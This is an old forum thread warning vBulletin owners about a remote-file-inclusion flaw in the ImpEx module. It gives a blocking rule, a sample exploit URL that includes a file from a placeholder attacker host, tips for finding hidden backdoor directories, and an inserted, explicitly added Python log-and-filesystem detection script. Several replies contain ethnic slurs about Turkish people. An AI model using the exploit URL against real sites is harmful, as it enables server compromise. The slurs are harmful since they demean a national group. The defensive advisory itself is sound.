ALERT for all Forum owners running vBulletin.

#1 SplitInfinity (Confirmed User, Dec 2002, 3047)

ALERT for all Forum owners running vBulletin.

SplitInfinity here letting you know that....

There is a known Turkish hacker group targeting the adult industry.
The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

First, you should immediately block this class C:

ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all

For some reason, they keep using the same IPs. Lame hackers. :-)

I have tracked them down and done some stuff to stop them from what they are doing.... however you should be warned that if you run vBulletin they will be hitting you soon! So far they have taken out over 10,000 sites as reported on securityfocus.

Vulnerability Classification:

* Remote/Network Access Required
* Input Manipulation
* Loss Of Integrity
* Exploit Available
* Verified
* Web Related

Products:

* vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex )

Solution:

Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes:

http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt?

Where the hackers play...
http://www.sanalinfaz.com/forumm/sho...=6140#post6140

They will use the exploit to install mech, eggdrops, backdoors to your server and more. I list below some common places they plant their files....

Places to check:
/tmp
/var/tmp/
/var/tmp/ssh
/var/tmp/root

Look for a file simply named "a"; it is a backdoor.
That list is NOT all inclusive as different groups will run different root kits for the same exploit....

Look for hidden directories by hitting TAB.

Example:

ls -la
total 20
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58
drwxrwxrwt 3 root root 4096 May 13 13:20 .
drwxr-xr-x 24 root root 4096 Jan 29 20:50 ..

Notice the seemingly empty one on top?
If I type: cd [TAB]

I get this:
cd \ /multi/

They used control characters to hide the name of the directory. It becomes exposed when tab completion has a go at it. They basically named the directory " " space... :-)

So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit they run is in there. :-)

total 1360
drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 .
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 ..
-rw-r--r-- 1 apache apache 454 Apr 24 07:08 `2Skeletzi.seen
-rw-r--r-- 1 apache apache 143 Apr 24 07:08 `50Cent.seen
-rw-r--r-- 1 apache apache 647 Apr 24 07:08 `50Centz.seen
-rw-r--r-- 1 apache apache 887 Apr 24 07:08 `5OCentz.seen
-rwxr-xr-x 1 apache apache 12 Dec 26 01:51 acycmech
-rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen
-rw-r--r-- 1 apache apache 527 Apr 24 07:08 Alexandreta.seen
-rw-r--r-- 1 apache apache 712 Apr 24 07:08 Al`Quaida.seen
-rw-r--r-- 1 apache apache 452 Apr 24 07:08 A-Tentat`.seen
-rw-r--r-- 1 apache apache 435 Apr 24 07:08 Aurora.seen
-rw-r--r-- 1 apache apache 234 Apr 24 07:08 BadBoy^.seen
-rw-r--r-- 1 apache apache 276 Apr 24 07:08 BaxDeCd`ie.seen
-rw-r--r-- 1 apache apache 941 Apr 24 07:08 B`Nicolita.seen
-rw-r--r-- 1 apache apache 878 Apr 24 07:08 Boxe.seen
-rw-r--r-- 1 apache apache 363 Apr 24 07:08 BUG`Mafia.seen
-rw-r--r-- 1 apache apache 842 Apr 24 07:08 C0Sty.seen
-rw-r--r-- 1 apache apache 620 Apr 24 07:08 CaracalCity.seen
-rw-r--r-- 1 apache apache 799 Apr 24 07:08 caracalmwe.seen
-rw-r--r-- 1 apache apache 339 Apr 24 07:08 CaracalTown.seen
-rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen
-rw-r--r-- 1 apache apache 692 Apr 24 07:08 CartierulHCC.seen
-rw-r--r-- 1 apache apache 581 Apr 24 07:08 CartziDeJoc.seen

Etc.... the list goes on
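The two things the post tells admins to look for, the ImpExData.php systempath request shape in the web logs and entries in /tmp or /var/tmp with blank or control-character names (plus the file named "a"), can both be checked with a small script. This is an added example, not code from the post or from vBulletin; it assumes Apache combined-format access logs, and the log lines and scratch directory tree it uses are constructed sample data.

```python
import os
import re
import tempfile
import unicodedata
from urllib.parse import urlparse, parse_qs

# Request shape from the post's "Manual Testing Notes": ImpExData.php with a
# systempath parameter. Flagged only when that value points at a remote URL.
RFI_RE = re.compile(r'GET\s+(\S*/impex/ImpExData\.php\?[^\s"]*)', re.IGNORECASE)

def is_rfi_request(line):
    """True when an access-log line is an ImpExData.php remote-include attempt."""
    m = RFI_RE.search(line)
    if not m:
        return False
    params = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
    # parse_qs URL-decodes, so an encoded http%3A%2F%2F value is caught as well.
    return any(urlparse(v).scheme in ("http", "https", "ftp")
               for v in params.get("systempath", []))

def hidden_name(name):
    """True for names that are blank or contain whitespace/control characters."""
    return name.strip() == "" or any(
        ch.isspace() or unicodedata.category(ch) == "Cc" for ch in name)

def hunt(paths):
    """Walk directories such as /tmp and /var/tmp; return sorted (reason, path)."""
    findings = []
    for root_dir in paths:
        for dirpath, dirnames, filenames in os.walk(root_dir):
            for name in dirnames + filenames:
                if hidden_name(name):
                    findings.append(("hidden-name", os.path.join(dirpath, name)))
            for name in filenames:
                if name == "a":  # the backdoor file name the post calls out
                    findings.append(("backdoor-name", os.path.join(dirpath, name)))
    return sorted(findings)

# Constructed sample log lines (combined log format); not real traffic.
LOG_SAMPLE = [
    '203.0.113.5 - - [13/May/2006:13:20:01 +0000] "GET /impex/ImpExData.php?systempath=http://198.51.100.7/evil.txt? HTTP/1.1" 200 512',
    '203.0.113.6 - - [13/May/2006:13:21:10 +0000] "GET /impex/ImpExData.php?systempath=/var/www/forum HTTP/1.1" 200 512',
    '203.0.113.7 - - [13/May/2006:13:22:00 +0000] "GET /forum/index.php HTTP/1.1" 200 3210',
]

def demo_tree():
    """Build a constructed scratch tree mirroring the post's listing and scan it."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, " ", "multi"))  # the directory named " "
    for rel in (" /multi/acycmech", "a", "session.txt"):
        open(os.path.join(base, rel), "w").close()
    return [reason for reason, _ in hunt([base])]
```

Run `hunt(["/tmp", "/var/tmp"])` as root on a live box; `demo_tree()` only exercises the logic on a throwaway directory.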
#2 $5 submissions (I help you SUCCEED, Nov 2003, 32195)
Thanks for the heads up!

#3 loverboy (When it rains, it pours, May 2003, 20609)
darn Turkish hackers

they want my sig now?

#4 split_joel (Confirmed User, Jan 2005, 2270)
hence proving my point chris is by far the whitest cracker here good find dude
E-mail marketing - Automation Scripting - IP Space
AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465
#5 SplitInfinity (Confirmed User, Dec 2002, 3047)
Thanks.

My opinion is that by sharing the info I find, I help secure everyone, not just my customers.

However, it does put my customers in a good place, don't it? :-)

Love ya all...

#6 Andiz (Confirmed User, Feb 2006, 2594)
Thank you very much!!

#7 CDSmith (Too lazy to set a custom title, May 2001, 51460)
Bump, if only to piss off the turkish hackers.
Promote Wildmatch, ImLive, Sexier.com, and more!!

ALWAYS THE HIGHEST PAYOUTS: Big Bux/ImLive SIGNUP ON NOW!!!

Put some PUSSYCA$H in your pocket.
ICQ me at: 31024634

#8 Spunky (I need a beer, Jun 2002, 133986)
Here's a bump for TD
#9 madawgz (8.8.8.8, Mar 2006, 30509)
thanks for the update
TAEMDLRMSKRJIXMRLSMRJ.

#10 Tannerb (Registered User, May 2006, 19)
Sounds like those Ottoman Empire hackers, they aren't just hacking the adult industry, it's all western sites, propaganda saying u attack our homes blah blah we attack your websites
ICQ 254-963-898

#11 fusionx (Confirmed User, Nov 2003, 4618)
will this hack work on windows servers?

#12 Manowar (jellyfish, Dec 2003, 71528)
thx for the headsup
#13 fusionx (Confirmed User, Nov 2003, 4618)
Originally posted by -=LC=-:
    so you are only vulnerable if you have SO old a version of vB, like older than version 1.7.5 ?
    so is it anyone whose site has like ver 2.X.X or newer, this does not affect?

That's the vBulletin ImpEx Module version 1.74.

It's in vBulletin 3.5 (don't know what earlier versions it's also in or if they are susceptible).

#14 czarina (Webmaster Extraordinaire, Jul 2002, 10752)
turkish people who don't like porn... hmm... is there anything they like, other than ugly women and hashish?

#15 ladida (Confirmed User, Nov 2005, 2179)
Rofl. Good work. You're only like 3 months too late. All that was supposed to be hacked was already hacked by now.
agentGFY *at* gmail.com

#16 JamesK2 (Confirmed User, Aug 2004, 6589)
going to work on that soon, thx for the heads up

#17 JamesK2 (Confirmed User, Aug 2004, 6589)
going to work on that soon, thx for the heads up
#18 Babaganoosh (♥♥♥ Likes Hugs ♥♥♥, Nov 2001, 15841)
Nice geek detective work. I'm impressed.
I like pie.

#19 woj (<&(©¿©)&>, Jul 2002, 47882)
with a properly secured server it should be impossible to own a site with this exploit...
Custom Software Development, email: woj#at#wojfun#.#com to discuss details or skype: wojl2000 or gchat: wojfun or telegram: wojl2000
Affiliate program tools: Hosted Galleries Manager Banner Manager Video Manager
Wordpress Affiliate Plugin Pic/Movie of the Day Fansign Generator Zip Manager

#20 elitetec (Too lazy to set a custom title, Sep 2005, 4944)
just hell with turkish hacker, they even don't know english

Add Your Site To My PR4 Blog
Selling Sig ICQ-200636146

#21 minusonebit (So Fucking Banned, Feb 2006, 7391)
Originally posted by fusionx:
    will this hack work on windows servers?
Even if it doesn't, you can bet that 100s of others will.
#22 dunefield (www.barely18movies.com, Feb 2003, 10920)
Cyber Jihad!!!

#23 SplitInfinity (Confirmed User, Dec 2002, 3047)
Woj, not everyone has a properly secured server because the programs they run have unknown exploits, that BECOME exploits after they are discovered.

#24 Sparks (Confirmed User, Nov 2004, 2466)
Ah, Thanks for the heads up!

#25 sfera (Confirmed User, Aug 2005, 8597)
great heads up

#26 bizarredollars (Confirmed User, Mar 2006, 1582)
Thanks for the info!!

[email protected]
icq: 205-252-550

#27 Dagwolf (President of Canada, Sep 2003, 23141)
I want my GFY
Money for nothin'
and pics for free.
Sleep well, and dream of large women.

#28 split_joel (Confirmed User, Jan 2005, 2270)
Originally posted by fusionx:
    will this hack work on windows servers?
im not sure if chris solution will work for ur windows server but yes the windows servers are just as much @ risk if not more
E-mail marketing - Automation Scripting - IP Space
AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465

#29 MaddCaz (Confirmed User, Mar 2006, 9483)
Thanks for heads up!

BigCocks.com - MatureWomen.com - Tranny.com - DrunkGirls.com - TeenGirls.com - MonsterCock.com and many more... Click here to see them all!